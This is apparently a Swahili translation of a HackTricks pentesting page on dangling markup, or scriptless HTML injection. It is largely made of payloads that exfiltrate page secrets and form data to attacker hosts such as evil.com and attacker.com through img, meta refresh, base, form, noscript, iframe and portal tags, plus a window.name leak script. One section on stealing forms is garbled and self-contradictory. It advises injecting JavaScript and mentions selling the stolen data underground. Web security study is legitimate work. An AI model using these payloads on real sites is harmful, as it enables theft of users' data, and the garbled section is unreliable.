hacktricks/pentesting-web/dangling-markup-html-scriptless-injection/README.md
2024-02-11 02:13:58 +00:00

15 KiB

Dangling Markup - Uingizaji wa HTML bila skripti

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Muhtasari

Tekniki hii inaweza kutumika kuondoa habari kutoka kwa mtumiaji wakati uingizaji wa HTML unapopatikana. Hii ni muhimu sana ikiwa hauoni njia yoyote ya kudukua XSS lakini unaweza kuingiza vitambulisho vya HTML.
Pia ni muhimu ikiwa siri fulani imehifadhiwa kwa wazi katika HTML na unataka kuiondoa kutoka kwa mteja, au ikiwa unataka kuongoza utekelezaji wa skripti fulani.

Tekniki kadhaa zilizojadiliwa hapa zinaweza kutumika kukiuka Sera ya Usalama wa Yaliyomo kwa kuondoa habari kwa njia isiyotarajiwa (vitambulisho vya html, CSS, http-meta tags, fomu, msingi...).

Matumizi Makuu

Kuiba siri zilizo wazi

Ikiwa unaingiza <img src='http://evil.com/log.cgi? wakati ukurasa unapakia, mwathirika atakutumia msimbo wote kati ya vitambulisho vya img vilivyochomwa na alama ya nukta inayofuata ndani ya msimbo. Ikiwa siri ipo kwa njia fulani katika kipande hicho, utaiba iyo (unaweza kufanya kitu kama hicho kwa kutumia alama ya nukta mbili, angalia ni ipi inayoweza kuwa ya kuvutia zaidi kutumia).

Ikiwa vitambulisho vya img vimezuiwa (kwa sababu ya CSP, kwa mfano) unaweza pia kutumia <meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?

<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=

Tafadhali kumbuka kwamba Chrome inazuia URL za HTTP zenye "<" au "\n", hivyo unaweza jaribu njia nyingine za itifaki kama vile "ftp".

Pia unaweza kutumia udanganyifu wa CSS @import (utatuma msimbo wote hadi utakapopata ";")

<style>@import//hackvertor.co.uk?     <--- Injected
<b>steal me!</b>;

Unaweza pia kutumia <table:

<table background='//your-collaborator-id.burpcollaborator.net?'

Unaweza pia kuweka lebo ya <base. Taarifa zote zitatumiwa mpaka nukuu ifungwe lakini inahitaji ushirikiano wa mtumiaji (mtumiaji lazima bonyeze kiungo fulani, kwa sababu lebo ya msingi itakuwa imebadilisha kikoa kinacholengwa na kiungo):

<base target='        <--- Injected
steal me'<b>test</b>

Kuiba Fomu

Kuna njia moja ya kudanganya tovuti na kuiba fomu zilizojazwa na watumiaji. Hii inajulikana kama "dangling markup" au "HTML scriptless injection". Kwa kufanya hivyo, unaweza kupata habari muhimu kama majina, anwani za barua pepe, nambari za simu, na habari nyingine kutoka kwa fomu hizo.

Kwa kuanza, unahitaji kuchunguza tovuti na kutafuta fomu ambazo unataka kuiba. Unaweza kutumia zana za kuchunguza wavuti kama "Burp Suite" au "OWASP ZAP" kufanya hivyo.

Baada ya kuchunguza fomu, unahitaji kubaini ikiwa kuna udhaifu wa "dangling markup" uliopo. Udhaifu huu unaweza kuwa kwa sababu ya kutokuwa na usalama katika nambari ya tovuti au kutokuwepo kwa ukaguzi wa kutosha wa data iliyowasilishwa na mtumiaji.

Ikiwa unapata udhaifu wa "dangling markup", unaweza kuingiza msimbo wa JavaScript katika fomu ili kuiba habari. Kwa mfano, unaweza kuongeza msimbo wa JavaScript ambao utatumwa kwa seva yako ya kudanganya na kurekodi habari zote zilizojazwa katika fomu.

Baada ya kuiba habari, unaweza kuzitumia kwa njia mbalimbali, kama vile kuuza habari hizo kwenye soko la chini ya ardhi au kuzitumia kwa madhumuni mengine ya uhalifu wa mtandao.

Ni muhimu kukumbuka kuwa kufanya hivyo ni kinyume cha sheria na inaweza kusababisha mashtaka ya jinai. Kwa hivyo, ni muhimu kufanya shughuli za uhalifu wa mtandao kwa njia halali na kwa idhini ya mmiliki wa tovuti.

<base href='http://evil.com/'>

Kisha, fomu ambazo hutuma data kwa njia (kama <form action='update_profile.php'>) zitatuma data kwa kikoa cha mbaya.

Kuiba fomu 2

Weka kichwa cha fomu: <form action='http://evil.com/log_steal'> hii itafuta kichwa cha fomu inayofuata na data yote kutoka kwenye fomu itatumwa kwa mshambuliaji.

Kuiba fomu 3

Kitufe kinaweza kubadilisha URL ambapo habari ya fomu itatumwa kwa kutumia sifa "formaction":

<button name=xss type=submit formaction='https://google.com'>I get consumed!

Mshambuliaji anaweza kutumia hii kuiba taarifa.

Kuiba siri wazi za maandishi 2

Kwa kutumia mbinu iliyotajwa hapo awali ya kuiba fomu (kwa kuingiza kichwa kipya cha fomu), unaweza kisha kuingiza uga mpya wa kuingiza:

<input type='hidden' name='review_body' value="

Na uga huu wa kuingiza utaleta yaliyomo kati ya alama zake za nukta mbili na nukta mbili inayofuata katika HTML. Shambulio hili linachanganya "Kuiba siri za maandishi wazi" na "Kuiba fomu2".

Unaweza kufanya kitu kama hicho kwa kuingiza fomu na lebo ya <option>. Data yote hadi <option> iliyofungwa inapopatikana itatumwa:

<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option

Uingizaji wa Parameta ya Fomu

Unaweza kubadilisha njia ya fomu na kuingiza thamani mpya ili hatua isiyotarajiwa ifanyike:

<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'>                                        ← Injected lines

<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value="">             ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>

Kuiba siri wazi ya maandishi kupitia noscript

<noscript></noscript> Ni lebo ambayo yaliyomo yake yataeleweka ikiwa kivinjari hakisaidii javascript (unaweza kuwezesha / kulemaza Javascript kwenye Chrome katika chrome://settings/content/javascript).

Njia ya kuchukua yaliyomo ya ukurasa wa wavuti kutoka sehemu ya kuingiza hadi chini hadi tovuti inayodhibitiwa na mshambuliaji itakuwa kwa kuingiza hii:

<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>

Kupitisha CSP kwa ushirikiano wa mtumiaji

Kutoka kwenye utafiti wa portswiggers unaweza kujifunza kwamba hata katika mazingira yaliyopewa kizuizi kikali zaidi cha CSP, bado unaweza kutoa data na baadhi ya ushirikiano wa mtumiaji. Katika tukio hili tutatumia mzigo wa:

<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='

Tafadhali kumbuka kuwa utamwomba mwathiriwa bonyeza kiungo ambacho kitampeleka kwenye payload inayodhibitiwa na wewe. Pia kumbuka kuwa sifa ya target ndani ya lebo ya base italeta maudhui ya HTML hadi alama ya nukta moja inayofuata. Hii itafanya thamani ya window.name ikiwa kiungo kimebonyezwa kuwa maudhui yote ya HTML hayo. Kwa hivyo, kwa kuwa wewe udhibiti ukurasa ambapo mwathiriwa anapata kwa kubonyeza kiungo, unaweza kupata ufikiaji wa window.name na kuvuja data hiyo:

<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>

Mchakato wa kudanganya wa hati 1 - Shambulio la nafasi ya HTML

Ingiza lebo mpya na kitambulisho ndani ya HTML ambayo itaandika juu ya ile inayofuata na na thamani ambayo itaathiri mchakato wa hati. Katika mfano huu, unachagua na nani habari itashirikiwa:

<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...

function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}

Kupotosha mtiririko wa hati 2 - Shambulio la jina la hati

Unda mizani ndani ya jina la javascript kwa kuingiza vitambulisho vya HTML. Kisha, mizani hii itaathiri mtiririko wa programu:

<img id='is_public'>                                        ← Injected markup

...

// Legitimate application code follows

function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}

function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
...
}

Matumizi Mabaya ya JSONP

Ikiwa utapata kiolesura cha JSONP, unaweza kuweza kuita kazi yoyote na data yoyote:

<script src='/editor/sharing.js'>:              ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
set_sharing({ ... })

Au unaweza hata kujaribu kutekeleza baadhi ya javascript:

<script src='/search?q=a&call=alert(1)'></script>

Matumizi ya Iframe

Hati ya mtoto ina uwezo wa kuona na kurekebisha mali ya location ya mzazi wake, hata katika hali za asili. Hii inaruhusu kuingiza hati ndani ya iframe ambayo inaweza kuhamisha mteja kwenye ukurasa usiojulikana:

<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>

Hii inaweza kuzuiwa kwa kutumia kitu kama: sandbox=' allow-scripts allow-top-navigation'

Pia, iframe inaweza kutumiwa kuvuja taarifa nyeti kutoka kwenye ukurasa tofauti kwa kutumia sifa ya jina ya iframe. Hii ni kwa sababu unaweza kuunda iframe ambayo inajifunga yenyewe kwa kutumia uingizaji wa HTML ambao unafanya taarifa nyeti ionekane ndani ya sifa ya jina ya iframe na kisha kufikia jina hilo kutoka kwenye iframe ya awali na kuvuja taarifa hiyo.

<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>

<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>

Kwa habari zaidi angalia https://portswigger.net/research/bypassing-csp-with-dangling-iframes

<meta utapeli

Unaweza kutumia meta http-equiv kufanya vitendo kadhaa kama kuweka Cookie: <meta http-equiv="Set-Cookie" Content="SESSID=1"> au kufanya uhamisho (baada ya sekunde 5 katika kesi hii): <meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />

Hii inaweza kuepukwa na CSP kuhusu http-equiv (Content-Security-Policy: default-src 'self';, au Content-Security-Policy: http-equiv 'self';)

Tag mpya ya <portal HTML

Unaweza kupata utafiti mzuri sana juu ya udhaifu unaoweza kudukuliwa wa tag ya <portal hapa.
Wakati wa kuandika hii, unahitaji kuwezesha tag ya portal kwenye Chrome katika chrome://flags/#enable-portals au haitafanya kazi.

<portal src='https://attacker-server?

Vujisho vya HTML

Sio njia zote za kuvuja uunganisho katika HTML zitakuwa na manufaa kwa Dangling Markup, lakini mara nyingine inaweza kusaidia. Angalia hapa: https://github.com/cure53/HTTPLeaks/blob/master/leak.html

SS-Leaks

Hii ni mchanganyiko kati ya dangling markup na XS-Leaks. Kwa upande mmoja, udhaifu huu huruhusu kuingiza HTML ( lakini sio JS) katika ukurasa wa asili sawa na ule tutakao shambulia. Kwa upande mwingine, hatutashambulia moja kwa moja ukurasa ambapo tunaweza kuingiza HTML, lakini ukurasa mwingine.

{% content-ref url="ss-leaks.md" %} ss-leaks.md {% endcontent-ref %}

XS-Search/XS-Leaks

XS-Search inalenga katika kuvuja taarifa za asili tofauti kwa kutumia mashambulizi ya njia ya upande. Kwa hivyo, ni mbinu tofauti na Dangling Markup, hata hivyo, baadhi ya mbinu zinatumia uingizaji wa vitambulisho vya HTML (na bila utekelezaji wa JS), kama vile CSS Injection au Lazy Load Images.

{% content-ref url="../xs-search.md" %} xs-search.md {% endcontent-ref %}

Orodha ya Uchunguzi wa Brute-Force

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}

Marejeo

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: